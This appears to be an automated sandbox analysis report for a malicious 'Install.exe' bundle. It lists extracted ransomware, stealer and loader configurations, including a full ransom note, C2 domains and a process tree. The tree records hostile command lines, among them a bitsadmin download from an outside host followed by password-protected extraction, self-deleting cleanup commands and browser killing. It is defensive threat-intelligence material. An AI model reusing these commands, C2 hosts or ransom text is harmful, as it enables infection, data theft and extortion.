Resubmissions

24-04-2021 20:28

210424-217qe8tpzs 10

24-04-2021 19:14

210424-6ffz35kxsx 10

24-04-2021 19:14

210424-ymq8bz33ts 10

24-04-2021 19:13

210424-2xx4hckd6s 10

24-04-2021 19:13

210424-4wwwcb3ajj 10

24-04-2021 15:54

210424-426ksbtgsa 10

24-04-2021 08:51

210424-1tz5lee51n 10

24-04-2021 06:41

210424-kfsqa5cgvx 10

Analysis

  • max time kernel
    1804s
  • max time network
    1771s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-04-2021 19:14

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: rootiunik@cock.li and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: rootiunik@cock.li Reserved email: TimothyCrabtree@protonmail.com Your personal ID: 1A6-F52-924 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

rootiunik@cock.li

TimothyCrabtree@protonmail.com

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 42 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2684
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2560
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2388
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2332
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1896
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1456
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1268
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1260
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1076
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:964
                    • C:\Users\Admin\AppData\Roaming\fjtcwte
                      C:\Users\Admin\AppData\Roaming\fjtcwte
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3828
                    • C:\Users\Admin\AppData\Roaming\igtcwte
                      C:\Users\Admin\AppData\Roaming\igtcwte
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3180
                      • C:\Users\Admin\AppData\Roaming\igtcwte
                        C:\Users\Admin\AppData\Roaming\igtcwte
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2456
                    • C:\Users\Admin\AppData\Roaming\fjtcwte
                      C:\Users\Admin\AppData\Roaming\fjtcwte
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3528
                    • C:\Users\Admin\AppData\Roaming\igtcwte
                      C:\Users\Admin\AppData\Roaming\igtcwte
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2948
                      • C:\Users\Admin\AppData\Roaming\igtcwte
                        C:\Users\Admin\AppData\Roaming\igtcwte
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6136
                    • C:\Users\Admin\AppData\Roaming\fjtcwte
                      C:\Users\Admin\AppData\Roaming\fjtcwte
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:5744
                    • C:\Users\Admin\AppData\Roaming\igtcwte
                      C:\Users\Admin\AppData\Roaming\igtcwte
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5588
                      • C:\Users\Admin\AppData\Roaming\igtcwte
                        C:\Users\Admin\AppData\Roaming\igtcwte
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:5496
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:296
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:804
                      • C:\Users\Admin\AppData\Local\Temp\is-V8VP8.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-V8VP8.tmp\Install.tmp" /SL5="$601D4,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3916
                        • C:\Users\Admin\AppData\Local\Temp\is-EU95K.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-EU95K.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2856
                          • C:\Program Files\Windows Portable Devices\SJOSVGXZEI\ultramediaburner.exe
                            "C:\Program Files\Windows Portable Devices\SJOSVGXZEI\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2212
                            • C:\Users\Admin\AppData\Local\Temp\is-84CHC.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-84CHC.tmp\ultramediaburner.tmp" /SL5="$40030,281924,62464,C:\Program Files\Windows Portable Devices\SJOSVGXZEI\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:808
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3992
                          • C:\Users\Admin\AppData\Local\Temp\50-f245c-e9a-255ac-26951ddc7e58e\Bakibiduzhe.exe
                            "C:\Users\Admin\AppData\Local\Temp\50-f245c-e9a-255ac-26951ddc7e58e\Bakibiduzhe.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1492
                          • C:\Users\Admin\AppData\Local\Temp\8b-d1b98-444-e5794-627c13d21deb5\Hylihymaso.exe
                            "C:\Users\Admin\AppData\Local\Temp\8b-d1b98-444-e5794-627c13d21deb5\Hylihymaso.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1032
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zk23ptbn.czz\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:476
                              • C:\Users\Admin\AppData\Local\Temp\zk23ptbn.czz\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\zk23ptbn.czz\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4224
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\twteetgt.52m\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4968
                              • C:\Users\Admin\AppData\Local\Temp\twteetgt.52m\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\twteetgt.52m\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:5100
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                    PID:1148
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pniyygan.qp0\md1_1eaf.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3152
                                • C:\Users\Admin\AppData\Local\Temp\pniyygan.qp0\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\pniyygan.qp0\md1_1eaf.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  PID:4472
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbkyxfj1.ab5\y1.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4144
                                • C:\Users\Admin\AppData\Local\Temp\tbkyxfj1.ab5\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\tbkyxfj1.ab5\y1.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3940
                                  • C:\Users\Admin\AppData\Local\Temp\KTzqalu1FT.exe
                                    "C:\Users\Admin\AppData\Local\Temp\KTzqalu1FT.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Modifies system certificate store
                                    PID:5340
                                    • C:\Users\Admin\AppData\Roaming\1619299079383.exe
                                      "C:\Users\Admin\AppData\Roaming\1619299079383.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619299079383.txt"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5864
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\KTzqalu1FT.exe"
                                      8⤵
                                        PID:4980
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          9⤵
                                          • Runs ping.exe
                                          PID:2056
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\tbkyxfj1.ab5\y1.exe"
                                      7⤵
                                        PID:5428
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /T 10 /NOBREAK
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:5768
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gvjc2nc3.ltl\askinstall39.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4684
                                    • C:\Users\Admin\AppData\Local\Temp\gvjc2nc3.ltl\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\gvjc2nc3.ltl\askinstall39.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:476
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:4156
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:1328
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o2wdhxbr.zbl\inst.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:5044
                                      • C:\Users\Admin\AppData\Local\Temp\o2wdhxbr.zbl\inst.exe
                                        C:\Users\Admin\AppData\Local\Temp\o2wdhxbr.zbl\inst.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4300
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\31ptd5av.wct\SunLabsPlayer.exe /S & exit
                                      5⤵
                                        PID:4512
                                        • C:\Users\Admin\AppData\Local\Temp\31ptd5av.wct\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\31ptd5av.wct\SunLabsPlayer.exe /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          PID:384
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5144
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5664
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5324
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5944
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5592
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        8⤵
                                                          PID:5768
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5544
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks for any installed AV software in registry
                                                          PID:5944
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          7⤵
                                                          • Download via BitsAdmin
                                                          PID:2588
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pK2IQC0j7i1EXgju -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2192
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:3164
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5416
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5992
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4960
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5428
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5372
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\GdVzvqerHYFl\GdVzvqerHYFl.dll" GdVzvqerHYFl
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:6088
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\GdVzvqerHYFl\GdVzvqerHYFl.dll" GdVzvqerHYFl
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      PID:6116
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5968
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5848
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4120
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5356
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjE765.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:4336
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:3544
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f30koj3j.2du\GcleanerWW.exe /mixone & exit
                                                                          5⤵
                                                                            PID:4940
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubjcd1zf.crj\toolspab1.exe & exit
                                                                            5⤵
                                                                              PID:5148
                                                                              • C:\Users\Admin\AppData\Local\Temp\ubjcd1zf.crj\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\ubjcd1zf.crj\toolspab1.exe
                                                                                6⤵
                                                                                  PID:5340
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ubjcd1zf.crj\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ubjcd1zf.crj\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:5292
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbhmua2o.1cv\c7ae36fa.exe & exit
                                                                                5⤵
                                                                                  PID:5404
                                                                                  • C:\Users\Admin\AppData\Local\Temp\cbhmua2o.1cv\c7ae36fa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\cbhmua2o.1cv\c7ae36fa.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:5844
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rn0s2te2.1h0\app.exe /8-2222 & exit
                                                                                  5⤵
                                                                                    PID:5624
                                                                                    • C:\Users\Admin\AppData\Local\Temp\rn0s2te2.1h0\app.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\rn0s2te2.1h0\app.exe /8-2222
                                                                                      6⤵
                                                                                        PID:5944
                                                                                        • C:\Users\Admin\AppData\Local\Temp\rn0s2te2.1h0\app.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\rn0s2te2.1h0\app.exe" /8-2222
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies system certificate store
                                                                                          PID:5520
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                              1⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1048
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                • Modifies registry class
                                                                                PID:2460
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:512
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4264
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4888
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              PID:4508
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:4644
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
